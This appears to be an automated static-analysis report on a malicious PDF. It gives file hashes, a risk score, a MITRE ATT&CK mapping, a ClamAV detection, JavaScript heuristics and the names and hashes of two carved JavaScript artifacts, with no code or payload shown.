Malicious PDF — malware analysis report

Static analysis result for SHA-256 bdcd959fd33a3c29…

MALICIOUS

PDF

45.0 KB
MD5: ab54a0f44b01538de8cfd57d2870c6ea SHA-1: 4ab01dd6efd70fbe4ba360eded12f712dc7a9b07 SHA-256: bdcd959fd33a3c290d275e472d4d5cede59d702ab8787e48f51c5ca92fa3ce49
76 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File Execution: Malicious JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. ClamAV detection as Pdf.Exploit.Agent-36128 further confirms its malicious nature. The large embedded JavaScript streams suggest the execution of code intended to download and execute further malicious content, a common technique for initial access or payload delivery.

Heuristics 3

  • ClamAV: Pdf.Exploit.Agent-36128 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
575fd0ca504281545cf12d15deaa213ec96f2d23cfffe49fd99a2a6dc870f03f		 pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 45305 bytes
legacy_pdfkit_stage_000.js
8e0b58686535c0569d1aabdc4e565fb48c3f06c5b5789d9e13351e52e0f9d863		 deobfuscated-js double percent-decoded annotation JavaScript at offset 0x1E7 33047 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.